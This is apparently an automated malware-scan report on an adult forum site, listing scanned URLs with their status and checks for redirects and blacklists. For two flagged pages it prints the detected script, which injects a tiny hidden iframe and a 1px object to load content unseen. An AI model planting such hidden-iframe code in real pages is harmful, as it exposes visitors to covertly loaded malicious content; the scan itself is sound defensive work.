Scanned pages/files
Request | Server response | Status |
http://www.irq-sex.com/ | 200 OK Content-Length: 84738 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var interstitialBox={ ie7: window.XMLHttpRequest && document.all && !window.opera, ie7offline: this.ie7 && window.location.href.indexOf("http")==-1, launch:false, scrollbarwidth: 16, loadpage:function(url){ page_request = url document.getElementById("interContent").innerHTML='<iframe src="'+ page_request +'" style="width: 10%; height: 1px" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hs } var pppid='pppid142'; document.write("<object style='display:block;width:1px;height:1px;position:absolute;left:0px;top:0px' id='"+pppid+"'></object>"); if (usingObject) {setupObject();} if (usingEditor) {startObject();} loadingPop(); self.focus(); --> Antivirus reports:
| ||
http://www.irq-sex.com/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=387 | 200 OK Content-Length: 36628 Content-Type: application/javascript | clean |
http://www.irq-sex.com/clientscript/yui/connection/connection-min.js?v=387 | 200 OK Content-Length: 11604 Content-Type: application/javascript | clean |
http://www.irq-sex.com/clientscript/vbulletin_global.js?v=387 | 200 OK Content-Length: 26028 Content-Type: application/javascript | clean |
http://www.irq-sex.com/clientscript/vbulletin_menu.js?v=387 | 200 OK Content-Length: 9441 Content-Type: application/javascript | clean |
http://adspaces.ero-advertising.com/adspace/143972.js | 200 OK Content-Length: 758 Content-Type: application/javascript | clean |
http://adspaces.ero-advertising.com/adspace/40745.js | 200 OK Content-Length: 1573 Content-Type: application/javascript | clean |
http://www.irq-sex.com/clientscript/vbulletin_md5.js?v=387 | 200 OK Content-Length: 5464 Content-Type: application/javascript | clean |
http://www.irq-sex.com/clientscript/vbulletin_read_marker.js?v=387 | 200 OK Content-Length: 3440 Content-Type: application/javascript | clean |
http://www.irq-sex.com/register.php | 200 OK Content-Length: 43325 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var interstitialBox={ ie7: window.XMLHttpRequest && document.all && !window.opera, ie7offline: this.ie7 && window.location.href.indexOf("http")==-1, launch:false, scrollbarwidth: 16, loadpage:function(url){ page_request = url document.getElementById("interContent").innerHTML='<iframe src="'+ page_request +'" style="width: 10%; height: 1px" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hs } var pppid='pppid142'; document.write("<object style='display:block;width:1px;height:1px;position:absolute;left:0px;top:0px' id='"+pppid+"'></object>"); if (usingObject) {setupObject();} if (usingEditor) {startObject();} loadingPop(); self.focus(); --> Antivirus reports:
| ||
http://www.irq-sex.com/external.php?type=rss | 200 OK Content-Length: 11306 Content-Type: text/xml | clean |
http://www.irq-sex.com/test404page.js | 404 Not Found Content-Length: 14 Content-Type: text/html | clean |
http://www.irq-sex.com/external.php?type=rss2 | 200 OK Content-Length: 22007 Content-Type: text/xml | clean |
http://www.irq-sex.com/go.php?url=http%3A%2F%2Fge.tt%2Fapi%2F1%2Ffiles%2F37Qvkfv1%2F0%2Fblob%3Fdownload | 200 OK Content-Length: 3196 Content-Type: text/html | clean |
http://www.irq-sex.com/go.php?url=http%3A%2F%2Fwww.gulfup.com%2F%3Fefnik5 | 200 OK Content-Length: 3176 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: irq-sex.com
Result:
GET / HTTP/1.1
Host: irq-sex.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: irq-sex.com
Referer: http://www.google.com/search?q=irq-sex.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: irq-sex.com
Referer: http://www.google.com/search?q=irq-sex.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=irq-sex.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://irq-sex.com/
Result: irq-sex.com is not infected or malware details are not published yet.
Result: irq-sex.com is not infected or malware details are not published yet.